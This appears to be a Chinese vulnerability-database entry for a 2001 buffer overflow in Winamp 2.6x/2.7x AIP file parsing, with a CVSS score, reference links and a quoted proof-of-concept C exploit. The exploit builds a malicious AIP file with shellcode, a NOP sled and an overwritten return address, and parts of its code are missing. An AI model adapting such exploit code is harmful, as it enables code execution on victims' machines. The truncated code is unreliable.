发布时间 :2001-06-27 00:00:00
修订时间 :2008-09-05 16:24:14

[原文]Buffer overflow in WINAMP 2.6x and 2.7x allows attackers to execute arbitrary code via a long string in an AIP file.


        WINAMP 2.6x和2.7x版本存在缓冲区溢出漏洞。攻击者借助AIP文件的超长字符串执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20010429 Winamp 2.6x / 2.7x buffer overflow

- 漏洞信息

高危 缓冲区溢出
2001-06-27 00:00:00 2005-10-20 00:00:00
        WINAMP 2.6x和2.7x版本存在缓冲区溢出漏洞。攻击者借助AIP文件的超长字符串执行任意代码。

- 公告与补丁


- 漏洞信息 (20820)

Nullsoft Winamp 2.x AIP Buffer Overflow Vulnerability (EDBID:20820)
windows remote
2001-04-29 Verified
0 byterage
N/A [点击下载]

Winamp is a popular media player supporting MP3 and other filetypes.

Versions of Winamp are vulnerable to a buffer overflow condition triggered during processing of Audiosoft parameter files (*.AIP).

A user may insert a large sequence of characters into an *.AIP file. When parsed by Winamp, the data will cause a stack overflow.

As a result of this overflow, excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address.

Since this data is supplied by the user, it could be made to alter the program's flow of execution.

Properly exploited, a maliciously composed AIP file could be used by a remote attacker (either through email or on a remote hostile website) to execute aribitrary code on a vulnerable system. 

 * wabof3.c - Winamp 2.6x/2.7x proof of concept code                       *
 *                                                                         *
 * proof of concept code written by [ByteRage]                             *
 *                                                                         *
 * the exploit is based upon WMAUDSDK.DLL v4.00.0000.3845, which is the    *
 * version that gets installed with winamp 2.6x / 2.7x. It should work     *
 * fine if that version wasn't overwritten by another program              *
 *                                                                         *
 * <> / (   *

#include <stdio.h>

#define LoadLibraryA "\x8C\x10\x10\x42"

#define GetProcAddress "\xF4\x10\x10\x42"

const char * newEBP = "00000000"; // we'll set EBP=0 and use it in the sploit

const char * newEIP = "83AD1142"; /* The new EIP must jump us to ECX
                                     @4211AD83 we find FFD1 = CALL ECX
                                     (in WMAUDSDK.DLL 4.00.0000.3845) */

// The exploit is no big wonder, it just shows a messagebox and kills
// the winamp process, however we have 2015 bytes for our code and we
// can still reload from the *.AIP so in theory anything is possible...

const char sploit[] =

"\x8B\x35" LoadLibraryA
"\x8B\x3D" GetProcAddress
"\x55""\x6A""!""\x68""full""\x68""cces""\x68""t su""\x68""ploi"
"\x68""t ex""\x68""ncep""\x68""f co""\x68""of o""\x68"" pro"
"\x68""2.7x""\x68"".6x/""\x68""mp 2""\x68""Wina"




int i;

FILE *file;

int main ()
  printf("Winamp 2.6x/2.7x proof of concept c0de by [ByteRage]\n");

  file = fopen("hackme.aip", "w+b");
  if (!file) {
    printf("Ouchy, couldn't open hackme.aip for output !\n");
    return 1;
  // (2) our exploit starts here
  fwrite(sploit, 1, sizeof(sploit)-1, file);
  // we fill the rest with NOPs
  for (i=0; i<(2015-(sizeof(sploit)-1)); i++) { fwrite("\x90", 1, 1, file); }
  // (1) we jump back a little more to (2)
  fwrite("\xE9\x1C\xF8\xFF\xFF", 1, 5, file);
  for (i=0; i<28; i++) { fwrite("0", 1, 1, file); }
  fwrite(newEBP, 1, 8, file); fwrite(newEIP, 1, 8, file);
  // ECX points here on overflow
  // we don't have alot space, so we jump to (1)
  fwrite("\x00\xC0\xEB\xCB", 1, 4, file);

  printf("hackme.aip created!\n");
  return 0;


- 漏洞信息

Winamp AIP File String Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2001-04-29 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete